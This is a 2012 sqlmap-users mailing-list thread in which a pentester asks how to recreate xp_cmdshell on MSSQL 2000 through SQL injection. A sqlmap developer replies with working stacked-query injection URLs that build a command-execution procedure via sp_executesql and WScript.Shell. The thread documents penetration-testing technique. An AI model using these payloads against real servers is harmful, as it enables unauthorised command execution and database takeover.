Re: [sqlmap-users] re-create xp_cmdshell
Brought to you by:
inquisb
From: Johnny V. <Joh...@zo...> - 2012-06-18 13:05:08
|
If you want to verify using network connectivity commands like ping, make sure you have access to a public IP and set wireshark on that box and listen for an ICMP connection from your target. On Jun 18, 2012, at 6:59 AM, Adi Mutu wrote: > No problem. > > Thanks, that worked, executed without error, however i still can't execute code. > I've added ; exec xp_cmdshell 'ping -n 30 www.yahoo.com';-- > but nothing, no delay. > > From: Miroslav Stampar <mir...@gm...> > To: Adi Mutu <adi...@ya...> > Cc: "sql...@li..." <sql...@li...> > Sent: Monday, June 18, 2012 1:38 PM > Subject: Re: [sqlmap-users] re-create xp_cmdshell > > My bad. > > I've thought that the problem is trivial :) > > This is the right way how to do it: > http://www.target.com/vuln.asp?id=1;DECLARE @abc nvarchar(999); SET @abc='CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'', @ID OUT EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 EXEC sp_OADestroy @ID'; EXEC master..sp_executesql @abc;-- > (https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/takeover/xp_cmdshell.py) > > That way you are bypassing that "syntax" obstacle by using a stored procedure master..sp_executesql to do it for you > > Kind regards, > Miroslav Stampar > > On Mon, Jun 18, 2012 at 11:24 AM, Miroslav Stampar <mir...@gm...> wrote: > Hi Adi. > > This means that CREATE PROCEDURE has to be used right after the semi-colon (;) sign. > > So, if you have a SELECT SQLi case like: > SELECT * FROM users WHERE id=$_GET['id'] > > you would need to inject into it something like: > http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE.. > > As you are probably using "recreate steps" from https://www.owasp.org/index.php/Testing_for_SQL_Server, this would mean that you would need to inject: > http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS%0aDECLARE @result int, @OLEResult int, @RunResult int%0a.... > > Kind regards, > Miroslav Stampar > > On Mon, Jun 18, 2012 at 10:59 AM, Adi Mutu <adi...@ya...> wrote: > > Hello, > > I have a mssql 2000 sql injection in a pentest, i try to recreate xp_cmdshell and i get this: > > 'CREATE PROCEDURE' must be the first statement in a query batch. > > Anybody has any idea about this behavious and if it can be done something about this? > > Thanks > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/_______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |